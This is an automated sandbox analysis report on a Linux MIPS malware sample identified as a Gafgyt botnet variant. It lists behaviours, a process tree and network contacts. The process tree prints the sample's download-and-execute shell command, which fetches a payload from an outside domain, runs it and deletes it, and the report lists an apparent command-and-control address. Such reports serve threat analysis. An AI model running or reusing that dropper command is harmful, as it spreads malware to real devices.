Analysis Overview
SHA256
93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2
Threat Level: Known bad
The file 93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf was found to be: Known bad.
Malicious Activity Summary
Detected Gafgyt variant
Gafgyt family
Executes dropped EXE
Modifies Watchdog functionality
Changes its process name
Reads system routing table
Reads system network configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-02 01:16
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gafgyt family
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-02 01:16
Reported
2024-04-02 01:18
Platform
debian9-mipsel-20240226-en
Max time kernel
148s
Max time network
139s
Command Line
Signatures
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | sshd | /tmp/93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/..... | /tmp/..... | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/misc/watchdog | N/A | N/A |
| File opened for modification | /dev/watchdog | N/A | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/..... | /usr/bin/wget | N/A |
Processes
/tmp/93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf
[/tmp/93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf]
/bin/sh
[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]
/usr/bin/wget
[wget -q http://gay.energy/.../vivid -O .....]
/bin/chmod
[chmod 777 .....]
/tmp/.....
[./.....]
/bin/sh
[/bin/sh ./.....]
/bin/rm
[rm -rf .....]
Network
| Country | Destination | Domain | Proto |
| MD | 85.239.33.129:666 | tcp | |
| US | 1.1.1.1:53 | gay.energy | udp |
| US | 1.1.1.1:53 | gay.energy | udp |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp |